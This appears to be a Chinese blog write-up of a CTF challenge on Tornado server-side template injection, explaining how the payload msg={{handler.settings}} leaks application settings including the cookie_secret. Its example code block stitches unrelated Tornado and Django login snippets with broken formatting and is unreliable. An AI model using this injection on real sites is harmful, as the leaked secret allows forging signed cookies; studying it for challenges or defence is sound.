原理
tornado render是python中的一個渲染函數,也就是一種模板,通過調用的參數不同,生成不同的網頁,如果用戶對render內容可控,不僅可以注入XSS代碼,而且還可以通過{{}}進行傳遞變量和執行簡單的表達式。
簡單的理解例子如下:
------------------------------------------------------------------------------------
import tornado.ioloop
import tornado.web
?
class MainHandler(tornado.web.RequestHandler):
??? def get(self):
??????? self.render('index.html')????? ?
class LoginHandler(BaseHandler):
??? def get(self):
??????? '''
??????? 當用戶訪登錄的時候我們就得給他寫cookie了,但是這里沒有寫在哪里寫了呢?
??????? 在哪里呢?之前寫的Handler都是繼承的RequestHandler,這次繼承的是BaseHandler是自己寫的Handler
??????? 繼承自己的類,在類了加擴展initialize! 在這里我們可以在這里做獲取用戶cookie或者寫cookie都可以在這里做
??????? '''
??????? '''
??????? 我們知道LoginHandler對象就是self,我們可不可以self.set_cookie()可不可以self.get_cookie()
??????? '''
??????? # self.set_cookie()
??????? # self.get_cookie()
??????? self.render('login.html', **{'status': ''})
def login(request):
??? #獲取用戶輸入
??? login_form = AccountForm.LoginForm(request.POST)
??? if request.method == 'POST':
??????? #判斷用戶輸入是否合法
??????? if login_form.is_valid():#如果用戶輸入是合法的
??????????? username = request.POST.get('username')
??????????? password = request.POST.get('password')
??????????? if models.UserInfo.objects.get(username=username) and models.UserInfo.objects.get(username=username).password == password:
??????????????????? request.session['auth_user'] = username
??????????????????? return redirect('/index/')
??????????? else:
??????????????? return render(request,'account/login.html',{'model': login_form,'backend_autherror':'用戶名或密碼錯誤'})
??????? else:
??????????? error_msg = login_form.errors.as_data()
??????????? return render(request,'account/login.html',{'model': login_form,'errors':error_msg})
??? # 如果登錄成功,寫入session,跳轉index
??? return render(request, 'account/login.html', {'model': login_form}
-------------------------------------------------------------------------------------
由上面可知:render是一個類似模板的東西,可以使用不同的參數來訪問網頁
在tornado模板中,存在一些可以訪問的快速對象,例如
???????? {{ escape(handler.settings["cookie"]) }}
這兩個{{}}和這個字典對象也許大家就看出來了,沒錯就是這個handler.settings對象
handler 指向RequestHandler
而RequestHandler.settings又指向self.application.settings
所有handler.settings就指向RequestHandler.application.settings了!
大概就是說,這里面就是我們一下環境變量,我們正是從這里獲取的cookie_secret
看題目的錯誤頁面
?
?
可見頁面返回的由msg的值決定,修改msg的值形成注入,獲得環境變量
?msg={{handler.settings}}? (見上面灰色高顯部分)
頁面回顯環境變量
{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK
得到cookie_secret
更多文章、技術交流、商務合作、聯系博主
微信掃碼或搜索:z360901061
微信掃一掃加我為好友
QQ號聯系: 360901061
您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點擊下面給點支持吧,站長非常感激您!手機微信長按不能支付解決辦法:請將微信支付二維碼保存到相冊,切換到微信,然后點擊微信右上角掃一掃功能,選擇支付二維碼完成支付。
【本文對您有幫助就好】元
